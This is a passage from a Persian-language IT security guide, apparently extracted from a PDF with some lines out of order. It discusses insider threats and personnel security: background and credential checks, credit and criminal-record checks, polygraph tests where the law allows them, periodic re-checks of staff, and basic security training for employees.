‫ﺑﻮﺩﻩﺍﻧﺪ‪ .‬ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ ‪%۸۰‬‬
‫ﺭﺧﺪﺍﺩﻫﺎ ﺗﻮﺳﻂ ﭼﻨﻴﻦ ﺍﻓﺮﺍﺩﻱ ﺭﺥ ﻣـﻲﺩﻫـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻗـﺴﻤﺖ‬
‫ﻣﻬﻤﻲ ﺍﺯ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺏ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺍﺩﺍﺭﺓ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﺑﺎ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ‪.‬‬
‫ﺍﻓﺮﺍﺩ ﺑﻪ ﺩﻭ ﺻﻮﺭﺕ ﺩﺭ ﺑﺮﻭﺯ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺗـﺄﺛﻴﺮ‬
‫ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻧﺒـﺎﻝ ﻧﻜـﺮﺩﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺑـﻪ‬
‫ﻓﺮﺍﻣﻮﺷﻲ ﺳﭙﺮﺩﻥ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻭ ﻣﻄﻠـﻊ ﻧﺒـﻮﺩﻥ ﺍﺯ ﻧﺘـﺎﻳﺞ‬
‫ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺳﻬﻮﹰﺍ ﺑﻪ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺁﮔﺎﻫﺎﻧـﻪ ﻛﻨﺘﺮﻟﻬـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺭﺍ‬
‫ﺯﻳﺮ ﭘﺎ ﻣﻲﮔﺬﺍﺭﻧﺪ ﺗﺎ ﺑﻪ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﻛﻤﻚ ﻛﺮﺩﻩ ﺑﺎﺷـﻨﺪ ﻳـﺎ‬
‫ﻼ ﺍﺷـﺎﺭﻩ‬
‫ﺧﻮﺩ ﺑﺘﻨﻬﺎﻳﻲ ﺑﺎﻋﺚ ﻭﻗﻮﻉ ﺁﻥ ﺷﻮﻧﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻗـﺒ ﹰ‬
‫ﻛــﺮﺩﻳﻢ ﺩﺭ ﺑﻴــﺸﺘﺮ ﻣــﻮﺍﺭﺩ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧــﻪ ﺩﺭ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻧﻘﺶ ﺩﺍﺭﻧﺪ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﻛﺎﺭﻣﻨـﺪ‬
‫ﺧﻮﺩﺗﺎﻥ ﻣﻲﺑﺎﺷﻨﺪ )ﻳﺎ ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺑﻮﺩﻩﺍﻧﺪ(‪ :‬ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎ‬
‫ﻣﻄﻠﻌﻨﺪ ﻭ ﻣﻲ ﺩﺍﻧﻨﺪ ﭼﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎ ﭼﻪ ﺍﺭﺯﺷﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ‬
‫ﻛﺪﺍﻡ ﻗﺴﻤﺖ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻼ ﻳـﻚ ﺳﻴـﺴﺘﻢ ‪ Unix‬ﺭﺍ ﺭﺍﻫﺒـﺮﻱ‬
‫ﺷﻤﺎ ﺩﺭ ﻃﻮﻝ ﻣﺪﺗﻲ ﻛﻪ ﻣﺜ ﹰ‬
‫ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﺍﺯ ﻫﺮ ﺩﻭ ﮔـﺮﻭﻩ ﻣﻮﺍﺟـﻪ ﺷـﻮﻳﺪ‪.‬‬
‫ﻛﻨﺘﺮﻟﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺘﻌـﺪﺩ‬
‫ﻭ ﮔﻮﻧﺎﮔﻮﻥ ﻫﺴﺘﻨﺪ ﻭ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﻛﺘـﺎﺏ‬
‫ﻦ ﺁﻧﻬﺎ‬
‫ﻛﺎﻣﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺎ ﺗﻨﻬﺎ ﺑﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﻣﻬﻤﺘﺮﻳ ﹺ‬
‫ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ‪ .‬ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻭﻗـﻮﻉ‬
‫ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ‬
‫ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧﻮﺩﺗـﺎﻥ ﻣﺘﻮﺟـﻪ ﺷـﺮﻛﺖ ﺷﻤﺎﺳـﺖ ﺭﺍ‬
‫ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﻨﻜﺎﺵ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻭ‬
‫ﻣﺪﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺴﻨﺠﻴﺪ؛ ﺯﻳﺮﺍ ﺗﺎﻛﻨﻮﻥ ﺑﺴﻴﺎﺭ ﭘﻴﺶ ﺁﻣﺪﻩ ﻛـﻪ‬
‫ﺍﻓﺮﺍﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺧﻮﺩ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩﻫـﺎﻱ ﻣﻌﺘﺒـﺮ‬
‫ﺳﺨﻦ ﺭﺍﻧﺪﻩﺍﻧﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺁﻥ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻫـﻴﭻ ﺳـﺎﺑﻘﻪﺍﻱ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪ ﺣﺘﻲ ﻳﻚ ﻭﺍﺣﺪ ﺩﺭﺳﻲ ﺗﻮﺳﻂ ﺁﻥ‬
‫ﺍﻓﺮﺍﺩ ﺑﺼﻮﺭﺕ ﻛﺎﻣﻞ ﮔﺬﺭﺍﻧﺪﻩ ﺷﺪﻩ ﺍﺳﺖ! ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﻣﺪﺍﺭﻛﻲ ﺍﺭﺋﻪ ﻛﻨﻨﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﺗﻨﻬﺎ ﺍﻧﺪﻛﻲ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﻳﻚ ﺩﻓﺘﺮ ﭘـﺴﺘﻲ ﻫـﺴﺘﻨﺪ! ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺍﺳﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣﺪﻥ ﺩﺭ ﻳﻚ ﺷﻐﻞ ﺑﻪ‬
‫ﺩﺭﻭﻍ ﻣﺘﻮﺳﻞ ﻣﻲﺷﻮﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺩﺭ ﻣـﺸﺎﻏﻞ ﺣـﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﺮﺩ‪.‬‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻣﺘﻤﺮﻛﺰ‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺤﻘﻴﻘﺎﺕ ﺟـﺪﻱﺗـﺮﻱ ﺩﺭ‬
‫ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺼﻴﺖ ﻭ ﭘﻴﺸﻴﻨﺔ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﺑﻪ ﺳﻄﺢ ﺷﻐﻠﻲ ﻛﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﻣﺘﻘﺎﺿـﻲ ﺩﺭ ﺁﻥ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ‬
‫ﺩﺳﺘﺮﺳﻴﻬﺎﻳﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺣـﺴﺎﺱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ‪:‬‬
‫•‬
‫ﺍﺯ ﻛﻤﻚ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻭﻳـﮋﺓ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﺔ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛‬
‫•‬
‫ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺳﻨﺪ ﻋﺪﻡ ﺳﻮﺀ ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﺑﺨﻮﺍﻫﻴﺪ؛‬
‫•‬
‫ﺳﻮﺍﺑﻖ ﺍﻋﺘﺒﺎﺭﻱ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴـﺪ ﺁﻳـﺎ‬
‫ﺑﺪﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺰﺭﮔﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﻛﻪ ﺍﺯ ﭘـﺲ ﺁﻥ ﺑـﺮ‬
‫ﻧﻴﺎﻣﺪﻩ ﺑﺎﺷﻨﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﮔﺮ ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﺩﺭﺑـﺎﺭﺓ ﺁﻥ‬
‫ﺑﺎ ﺧﻮﺩ ﻣﺘﻘﺎﺿـﻲ ﮔﻔﺘﮕـﻮ ﻛﻨﻴـﺪ‪ .‬ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣﻘـﺮﻭﺽ‬
‫ﻫﺴﺘﻨﺪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻛـﺎﺭ ﻛـﺮﺩﻥ ﻣﺤـﺮﻭﻡ ﺷـﻮﻧﺪ؛ ﭼـﻮﻥ ﺩﺭ‬
‫ﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭽﮕﺎﻩ ﻗﺪﺭﺕ ﺑﺎﺯﭘﺮﺩﺍﺧﺖ ﺑـﺪﻫﻲﻫﺎﻳـﺸﺎﻥ ﺭﺍ‬
‫ﭘﻴﺪﺍ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺭﻓﺘﺎﺭ ﻧﺎﺩﺭﺳﺖ ﻛﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻧﻲﻛﻪ ﺗﺤـﺖ‬
‫ﻓﺸﺎﺭﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺴﺘﻨﺪ ﺑﻴﺸﺘﺮ ﺍﺳﺖ‪.‬‬
‫•‬
‫ﺑﻌﻤﻞ ﺁﻭﺭﺩﻥ ﺁﺯﻣـﻮﻥ ﺩﺭﻭﻍ ﺳـﻨﺠﻲ ﺍﺯ ﻣﺘﻘﺎﺿـﻲ ﺭﺍ )ﺍﮔـﺮ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ‬
‫ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﻪﻫﺎ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﺟﺪﻳﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻣﻲﻛﻨﻴﺪ ﭘﻴـﺸﻴﻨﺔ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺧﻮﺍﺳـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﻓﺮﻣﻬﺎﻱ ﺍﺳﺘﺨﺪﺍﻣﻲ ﺭﺍ ﭘﺮ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﭼﻪ؟ ﺣـﺪﺍﻗﻞ ﻛـﺎﺭ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﻫﺮ ﻣﺘﻘﺎﺿﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻧﺪﻥ‬
‫ﺧﻮﺩ ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑـﻪ ﮔﺬﺷـﺘﺔ ﺍﻭ ‪ -‬ﺍﺯ‬
‫ﺟﻤﻠﻪ ﺩﻻﻳﻞ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ ﻗﺒﻠـﻲﺍﺵ ‪ -‬ﭘـﻲ ﺑﺒﺮﻳـﺪ‪ .‬ﻓﺮﺍﻣـﻮﺵ‬
‫ﻧﻜﻨﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺭﺳﻲ ﺳﻮﺍﺑﻖ‪ ،‬ﺗﺎﺭﻳﺦ ﺍﺳﺘﺨﺪﺍﻣﻬﺎ ﻭ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ‬
‫ﻗﺒﻠﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﺯﻩﻫﺎﻱ ﺧﺎﻟﻲ ﻣﻴﺎﻥ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺩﻗـﺖ ﻣـﻮﺭﺩ‬
‫ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ( ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﻧﺪﺍﺭﻳـﺪ‪ .‬ﮔﺮﭼـﻪ‬
‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﺩﺭﻭﻍﺳﻨﺠﻲ ﻫﻤﻴﺸﻪ ﺩﻗﻴﻖ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﺍﮔـﺮ‬
‫ﻣﻮﻗﻌﻴــﺖ ﺷــﻐﻠﻲ ﺣــﺴﺎﺳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻣﺘﻘﺎﺿــﻲ ﺩﺭﻧﻈــﺮ‬
‫ﮔﺮﻓﺘﻪﺍﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻔﻴﺪ ﺑﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﻣﺘﻘﺎﺿﻲ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺩﺭ ﺷﻐﻞ ﻣﺮﺑﻮﻃﻪ ﻳﻚ‬
‫ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﺑﻴﺎﻭﺭﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻧﺠﺎﻡ ﺗﻤﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ‬
‫‪١٦١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻮﺻﻴﻪ ﻧﻤﻲﺷـﻮﺩ‪ ،‬ﺍﻣـﺎ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺩﺭ ﭘﺴﺘﻬﺎﻳﻲ ﻛﺎﺭ ﻛﻨﻨﺪ ﻛﻪ‬
‫ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﺳﻄﺢ ﺑﺎﻻﻳﻲ ﺍﺯ ﺍﻋﺘﻤﺎﺩ ﻧﻴﺎﺯ ﺍﺳـﺖ ﻭ ﺷـﺎﻏﻠﻴﻦ‬
‫ﻧﻴﺰ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻭﻳـﮋﻩ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﻣـﻲﺷـﻮﻧﺪ ‪ -‬ﻣﺜـﻞ‬
‫ﺟﺬﺏ ﻭ ﻳﺎ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ‪ -‬ﺑﺎﻳﺪ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﻛﻨﻴﻢ ﺑﻪ ﻣﺘﻘﺎﺿﻲ ﺍﻃﻼﻉ ﺩﻫﻴﺪ‬
‫ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻨﻴﻦ ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻨﻜﺎﺭ ﺭﺿﺎﻳﺖ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺟﻠﺐ ﻛﻨﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺮﭼﻨﺪ‬
‫ﺿﺮﻭﺭﻱ ﻧﻴﺴﺖ ﻭﻟﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻧﺠـﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ‬
‫ﺭﺍﺣﺖﺗﺮ ﺷـﻮﺩ ﻭ ﻣﺘﻘﺎﺿـﻲ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻭﻱ ﻣﺤﺘﺎﻁ ﻭ ﺟـﺪﻱ ﻫـﺴﺘﻴﺪ‪ .‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻪ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻣﺘﻘﺎﺿﻲ ﻧﻴـﺎﺯ‬
‫ﺩﺍﺭﻳﺪ‪.‬‬
‫ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﺯﻣﻮﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﻭ ﻣﺘﻘﺎﺿﻲ ﺭﺍ ﺍﺳـﺘﺨﺪﺍﻡ‬
‫ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﻣﺠﺪﺩﹰﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﻫﻴﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ﺑﺎﻳﺪ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﻗﺒﻠﻲ ﺭﺍ ﺑـﺎ ﻫـﻢ‬
‫ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﻪ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﭘـﻲ ﺑﺒﺮﻳـﺪ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻛﺎﺭﻣﻨﺪﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺴﺌﻮﻝ ﺳﻴـﺴﺘﻢ‬
‫ﺣــﺴﺎﺑﺪﺍﺭﻱ ﺷــﻤﺎ ‪ -‬ﺍﺯ ﺟﻤﻠــﻪ ﺗﻬﻴــﺔ ﭼﻜﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺮﺍﻱ‬
‫ﺑــﺴﺘﺎﻧﻜﺎﺭﺍﻥ ‪ -‬ﺑﺎﺷــﺪ‪ ،‬ﺷــﺎﻳﺪ ﻻﺯﻡ ﺑﺎﺷــﺪ ﺍﻋﺘﺒــﺎﺭ ﻣﻮﺟــﻮﺩ ﺩﺭ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺎﺯﻩﻫـﺎﻱ ﻛﻮﺗـﺎﻩ ﺯﻣـﺎﻧﻲ ﺑﺮﺭﺳـﻲ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺮﺭﺳﻲ ﻭ ﺗﺤﻘﻴﻖ ﻣﺠﺪﺩ ﺷﻤﺎ ﻫﺮ ﺩﻭ ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ‬
‫ﺷﻮﺩ ﻭ ﺩﺭﻳﺎﺑﻴﺪ ﻛﻪ ﺭﻓﺘﺎﺭ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﺎﺭﺝ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻋﻠﻲﺍﻟﻘﺎﻋﺪﻩ ﺗﺼﻤﻴﻢ ﺧﻮﺍﻫﻴﺪ ﮔﺮﻓﺖ ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫ﻣﻮﺭﺩ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺑﻌﻤﻞ ﺑﻴﺎﻭﺭﻳﺪ‪.‬‬
‫ﺁﻣﻮﺯﺵ ﺍﻭﻟﻴﻪ‬
‫ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﻳـﻚ ﻛﺎﺭﻣﻨـﺪ ﻧﺒﺎﻳـﺪ ﭘـﺲ ﺍﺯ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﺍﻭ ﻣﺘﻮﻗﻒ ﺷﻮﺩ‪ .‬ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﺣﺘﻤـﹰﺎ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻣﻮﺯﺷﻬﺎﻱ ﺯﻳﺮﺑﻨﺎﻳﻲ ﺑﺒﻴﻨﺪ‪ .‬ﺍﻳﻦ ﺁﻣـﻮﺯﺵ ﺩﺭ‬
‫ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺘﺨﺎﺏ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ )ﺍﻳﻨﻜـﻪ‬
‫ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺍﺳﺖ ﺑﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺘﺼﻞ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ(‪ ،‬ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﻪ‬
‫ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﻧﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ‬
